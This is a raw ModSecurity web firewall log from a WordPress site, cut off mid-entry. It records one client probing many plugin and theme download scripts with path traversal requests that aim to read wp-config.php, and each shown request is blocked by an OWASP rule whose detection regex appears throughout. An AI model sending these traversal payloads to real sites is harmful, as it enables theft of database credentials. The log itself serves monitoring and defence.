"(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mac-dock-gallery/macdownload.php?albid=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mac-dock-gallery/macdownload.php"] [unique_id "ZN-wXfG_rKmCSnA6LxD5egAAAAA"] [Fri Aug 18 12:54:38.817604 2023] [:error] [pid 18873:tid 140103457580800] [client 87.249.132.213:35166] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-e-commerce/wpsc-includes/misc.functions.php?image_name=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-e-commerce/wpsc-includes/misc.functions.php"] [unique_id "ZN-wXrCcrCl0jrDdhfxXNgAAAEU"] [Fri Aug 18 12:54:38.912289 2023] [:error] [pid 18873:tid 140103465973504] [client 87.249.132.213:35168] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php"] [unique_id "ZN-wXrCcrCl0jrDdhfxXNwAAAEQ"] [Fri Aug 18 12:54:39.006555 2023] [:error] [pid 18874:tid 140103292770048] [client 87.249.132.213:35170] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/thecartpress/modules/Miranda.class.php?page=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/thecartpress/modules/Miranda.class.php"] [unique_id "ZN-wX1xvK4MFoveIP9_KngAAAJA"] [Fri Aug 18 12:54:39.101102 2023] [:error] [pid 18874:tid 140103317948160] [client 87.249.132.213:35172] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/twentyeleven/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyeleven/download.php"] [unique_id "ZN-wX1xvK4MFoveIP9_KnwAAAI0"] [Fri Aug 18 12:54:39.195591 2023] [:error] [pid 18874:tid 140103474366208] [client 87.249.132.213:35174] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/twentyeleven/download.php?filename=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyeleven/download.php"] [unique_id "ZN-wX1xvK4MFoveIP9_KoAAAAIM"] [Fri Aug 18 12:54:39.301083 2023] [:error] [pid 18874:tid 140103465973504] [client 87.249.132.213:35176] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/cip4-folder-download-widget/cip4-download.php?target=..%2F..%2F..%2Fwp-config.php&info=wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cip4-folder-download-widget/cip4-download.php"] [unique_id "ZN-wX1xvK4MFoveIP9_KoQAAAIQ"] [Fri Aug 18 12:54:40.261590 2023] [:error] [pid 19445:tid 140103343126272] [client 87.249.132.213:35180] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/duena/download.php?f=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/duena/download.php"] [unique_id "ZN-wYEWc94tsnIsHAQ-XcwAAAMo"] [Fri Aug 18 12:54:40.355999 2023] [:error] [pid 19445:tid 140103499544320] [client 87.249.132.213:35182] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/endlesshorizon/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/endlesshorizon/download.php"] [unique_id "ZN-wYEWc94tsnIsHAQ-XdAAAAMA"] [Fri Aug 18 12:54:40.451259 2023] [:error] [pid 18874:tid 140103242413824] [client 87.249.132.213:35184] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mTheme-Unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "ZN-wYFxvK4MFoveIP9_KowAAAJY"] [Fri Aug 18 12:54:40.545666 2023] [:error] [pid 18872:tid 140103359911680] [client 87.249.132.213:35186] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/NativeChurch/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "ZN-wYPG_rKmCSnA6LxD5ewAAAAg"] [Fri Aug 18 12:54:40.640263 2023] [:error] [pid 18872:tid 140103234021120] [client 87.249.132.213:35188] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/estrutura-basica/scripts/download.php?arquivo=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/estrutura-basica/scripts/download.php"] [unique_id "ZN-wYPG_rKmCSnA6LxD5fAAAABc"] [Fri Aug 18 12:54:40.734561 2023] [:error] [pid 18872:tid 140103292770048] [client 87.249.132.213:35190] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/zip-attachments/download.php?za_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/zip-attachments/download.php"] [unique_id "ZN-wYPG_rKmCSnA6LxD5fQAAABA"] [Fri Aug 18 12:54:41.560635 2023] [:error] [pid 19445:tid 140103317948160] [client 87.249.132.213:35196] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mdc-youtube-downloader/includes/download.php"] [unique_id "ZN-wYUWc94tsnIsHAQ-XdwAAAM0"] [Fri Aug 18 12:54:42.909556 2023] [:error] [pid 18872:tid 140103376697088] [client 87.249.132.213:35204] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php"] [unique_id "ZN-wYvG_rKmCSnA6LxD5fwAAAAY"] [Fri Aug 18 12:54:43.017944 2023] [:error] [pid 18874:tid 140103275984640] [client 87.249.132.213:35206] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/authentic/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/authentic/includes/download.php"] [unique_id "ZN-wY1xvK4MFoveIP9_KpAAAAJI"] [Fri Aug 18 12:54:43.132667 2023] [:error] [pid 19445:tid 140103351518976] [client 87.249.132.213:35208] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/acento/includes/view-pdf.php?download=1&file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/acento/includes/view-pdf.php"] [unique_id "ZN-wY0Wc94tsnIsHAQ-XeQAAAMk"] [Fri Aug 18 12:54:43.251087 2023] [:error] [pid 19445:tid 140103309555456] [client 87.249.132.213:35210] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/fiestaresidences/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/fiestaresidences/download.php"] [unique_id "ZN-wY0Wc94tsnIsHAQ-XegAAAM4"] [Fri Aug 18 12:54:43.345996 2023] [:error] [pid 19445:tid 140103376697088] [client 87.249.132.213:35214] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/optimus/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/optimus/download.php"] [unique_id "ZN-wY0Wc94tsnIsHAQ-XfAAAAMY"] [Fri Aug 18 12:54:43.440189 2023] [:error] [pid 18874:tid 140103376697088] [client 87.249.132.213:35216] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/erinvale/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/erinvale/download.php"] [unique_id "ZN-wY1xvK4MFoveIP9_KpQAAAIY"] [Fri Aug 18 12:54:43.534485 2023] [:error] [pid 18873:tid 140103225628416] [client 87.249.132.213:35218] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/hsv/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/hsv/download.php"] [unique_id "ZN-wY7CcrCl0jrDdhfxXOAAAAFg"] [Fri Aug 18 12:54:43.629423 2023] [:error] [pid 19445:tid 140103491151616] [client 87.249.132.213:35220] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/SMWF/inc/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/SMWF/inc/download.php"] [unique_id "ZN-wY0Wc94tsnIsHAQ-XfQAAAME"] [Fri Aug 18 12:54:43.741403 2023] [:error] [pid 19445:tid 140103334733568] [client 87.249.132.213:35222] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| 